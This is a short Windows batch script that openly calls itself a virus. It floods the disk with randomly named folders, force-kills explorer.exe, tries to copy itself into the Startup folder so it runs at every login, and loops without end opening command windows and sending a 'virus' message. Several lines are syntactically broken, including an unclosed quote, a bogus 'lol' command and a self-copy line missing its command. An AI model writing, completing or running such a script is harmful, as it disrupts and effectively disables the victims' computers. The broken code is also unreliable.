@echo off
setlocal enabledelayedexpansion
set "num_folders=1000
set "prefix=Folder_"
for /l %%i in (1,1,%num_folders%) do (
set "rand_name=!prefix!!random!!random!!random!!random!!random!"
mkdir "!rand_name!"
mkdir "!rand_name!\256426542465"
lol > "!rand_name!\256426542465\OOF.txt"
taskkill /f /im explorer.exe
set "autostart=%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
set "batchfile=%~f0"
/y "%batchfile%" "%autostart%"
:loop
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
msg * lvl3 virus
goto loop